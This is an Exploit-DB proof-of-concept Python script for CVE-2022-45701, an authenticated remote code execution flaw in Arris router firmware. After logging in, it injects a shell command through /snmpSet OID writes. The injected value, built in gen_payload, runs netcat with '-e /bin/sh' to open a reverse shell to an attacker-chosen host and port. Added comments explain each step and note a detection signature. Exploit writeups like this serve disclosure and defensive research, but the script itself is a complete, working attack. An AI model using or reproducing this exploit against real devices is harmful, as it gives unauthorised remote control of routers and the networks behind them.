source link: https://www.exploit-db.com/exploits/51269
Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701
import requests
import base64
# Connection and credential settings read by main() and the helpers below.
router_host = "http://192.168.0.1"  # plain HTTP: the base64 credential built by gen_header() is sent unencrypted
username = "admin"  # the script is authenticated-only: it works only while these credentials are still valid
password = "password"
# Host/port that gen_payload() embeds in the string written to the device (see send_payload()).
lhost = "192.168.0.6"
lport = 80
def main():
    """Run the chain: authenticate, build the command string, write it via /snmpSet.

    Uses the module-level router_host, username, password, lhost and lport.
    Exits with status -1 when get_cookie() returns an empty body, which this
    script treats as an authentication failure; no other error is handled.
    """
    print("Authorizing...")
    # "user:pass" base64 goes in the /login query string; the response body is used as the session cookie.
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        exit(-1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    # send_payload() never checks a response, so "Done" only means the requests were sent.
    send_payload(payload, cookie)
    print("Done, check shell..")
def gen_header(u, p):
    """Return "u:p" base64-encoded as ASCII text (the HTTP Basic credential form)."""
    credential = "%s:%s" % (u, p)
    encoded = base64.b64encode(credential.encode("ascii"))
    return encoded.decode("ascii")
def no_encode_params(params):
    """Join params into a "k=v&k=v" query string with no percent-encoding.

    A prebuilt string is handed to requests instead of a dict so that values
    already containing literal "%20" are sent verbatim rather than re-escaped.
    """
    pairs = []
    for key, value in params.items():
        pairs.append(f"{key}={value}")
    return "&".join(pairs)
def get_cookie(header):
    """GET /login with the base64 credential and return the response body as the session cookie.

    The credential and "_n=1" are placed in the query string without encoding
    (see no_encode_params), so the base64 user:pass appears in the URL over plain
    HTTP and in any web-server or proxy log. The body is returned decoded as UTF-8;
    callers treat "" as authentication failure. No HTTP status check is done here.
    """
    url = router_host+"/login"
    params = no_encode_params({"arg":header, "_n":1})
    resp=requests.get(url, params=params)
    # The raw body is what set_oid() later sends as the "credential" cookie.
    return resp.content.decode('UTF-8')
def set_oid(oid, cookie):
    """GET /snmpSet?oid=<oid>&_n=1 with the "credential" cookie; the response is discarded.

    `oid` is sent verbatim (no percent-encoding), so every character in it reaches
    the device untouched. From a monitoring standpoint, /snmpSet requests whose oid
    value carries shell metacharacters such as "$(" are the signature of this chain.
    """
    url = router_host+"/snmpSet"
    params = no_encode_params({"oid":oid, "_n":1})
    cookies = {"credential":cookie}
    # Fire-and-forget: neither status code nor body is inspected.
    requests.get(url, params=params, cookies=cookies)
def gen_payload(h, p):
    """Build the value that send_payload() writes to OID ...1.20.1.1.7.2.0.

    The result is a shell command-substitution string with spaces as literal
    "%20", because no_encode_params() does no encoding. h and p are lhost/lport
    from main(); nothing validates them. Note that "\(" is not a recognised
    Python escape, so the backslash is kept in the output (newer interpreters
    warn about it) - the string starts with "$\(" exactly as written.
    """
    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"
def send_payload(payload, cookie):
    """Write six OIDs under 1.3.6.1.4.1.4115.1.20.1.1.7.* in a fixed order, with `payload` in .2.0.

    Each value carries a ";N;" suffix that is sent as-is; what the suffix and the
    individual OIDs mean on the device is not visible in this file (presumably
    per-feature parameters followed by a trigger in .9.0 - confirm against the
    firmware and the CVE-2022-45701 advisory named in the header). The order
    matters: .2.0 receives the command string before .9.0 is set. No call checks
    a response, so success is only inferred by the caller.
    """
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
    # The untrusted-looking value lands here; the device is expected to pass it to a shell.
    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
if __name__ == '__main__':
    # Script entry point; importing the module only defines the settings and functions.
    main()